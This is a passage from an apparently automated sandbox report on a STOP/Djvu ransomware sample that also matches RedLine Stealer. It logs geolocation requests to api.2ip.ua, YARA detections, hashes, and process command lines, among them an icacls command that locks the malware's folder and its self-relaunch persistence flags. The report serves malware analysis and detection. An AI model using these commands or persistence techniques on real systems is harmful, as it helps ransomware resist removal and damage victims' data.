2022-08-05 09:22:40 UTC	1	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 05 Aug 2022 09:22:40 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2022-08-05 09:22:40 UTC	1	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49768	162.0.217.254	443	C:\Users\user\Desktop\bE5aaTiJM0.exe

Timestamp	kBytes transferred	Direction	Data
2022-08-05 09:22:51 UTC	2	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-08-05 09:22:51 UTC	2	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 05 Aug 2022 09:22:51 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2022-08-05 09:22:51 UTC	2	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49780	162.0.217.254	443	C:\Users\user\Desktop\bE5aaTiJM0.exe

Timestamp	kBytes transferred	Direction	Data
2022-08-05 09:22:57 UTC	3	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-08-05 09:22:57 UTC	3	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 05 Aug 2022 09:22:57 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2022-08-05 09:22:57 UTC	4	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49781	162.0.217.254	443	C:\Users\user\Desktop\bE5aaTiJM0.exe

Timestamp	kBytes transferred	Direction	Data
2022-08-05 09:22:58 UTC	4	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-08-05 09:22:58 UTC	4	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 05 Aug 2022 09:22:58 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2022-08-05 09:22:58 UTC	5	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: bE5aaTiJM0.exePID: 4004, Parent PID: 3120

General

Target ID:	0
Start time:	11:22:15
Start date:	05/08/2022
Path:	C:\Users\user\Desktop\bE5aaTiJM0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bE5aaTiJM0.exe"
Imagebase:	0x400000
File size:	747520 bytes
MD5 hash:	5FAE11A9DDB49452B6896FD3217E9665
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bE5aaTiJM0.exePID: 5720, Parent PID: 4004

General

Target ID:	2
Start time:	11:22:19
Start date:	05/08/2022
Path:	C:\Users\user\Desktop\bE5aaTiJM0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bE5aaTiJM0.exe"
Imagebase:	0x400000
File size:	747520 bytes
MD5 hash:	5FAE11A9DDB49452B6896FD3217E9665
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.372461553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: icacls.exePID: 1284, Parent PID: 5720

General

Target ID:	5
Start time:	11:22:26
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0xa30000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: bE5aaTiJM0.exePID: 5592, Parent PID: 5720

General

Target ID:	7
Start time:	11:22:27
Start date:	05/08/2022
Path:	C:\Users\user\Desktop\bE5aaTiJM0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x7ff6406f0000
File size:	747520 bytes
MD5 hash:	5FAE11A9DDB49452B6896FD3217E9665
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.409352563.00000000027E4000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bE5aaTiJM0.exePID: 4376, Parent PID: 696

General

Target ID:	8
Start time:	11:22:27
Start date:	05/08/2022
Path:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task
Imagebase:	0x400000
File size:	747520 bytes
MD5 hash:	5FAE11A9DDB49452B6896FD3217E9665
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.448142800.00000000041B2000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 54%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bE5aaTiJM0.exePID: 3616, Parent PID: 5592

General

Target ID:	9
Start time:	11:22:34
Start date:	05/08/2022
Path:	C:\Users\user\Desktop\bE5aaTiJM0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	747520 bytes
MD5 hash:	5FAE11A9DDB49452B6896FD3217E9665
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.402254205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bE5aaTiJM0.exePID: 5828, Parent PID: 3688

General

Target ID:	10
Start time:	11:22:36
Start date:	05/08/2022
Path:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
Imagebase:	0x400000
File size:	747520 bytes
MD5 hash:	5FAE11A9DDB49452B6896FD3217E9665
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.429478962.00000000041D1000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bE5aaTiJM0.exePID: 5832, Parent PID: 5828

General

Target ID:	11
Start time:	11:22:40
Start date:	05/08/2022
Path:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
Imagebase:	0x400000
File size:	747520 bytes
MD5 hash:	5FAE11A9DDB49452B6896FD3217E9665
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.418527999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bE5aaTiJM0.exePID: 3920, Parent PID: 4376

General

Target ID:	12
Start time:	11:22:43
Start date:	05/08/2022
Path:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task
Imagebase:	0x400000
File size:	747520 bytes
MD5 hash:	5FAE11A9DDB49452B6896FD3217E9665
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
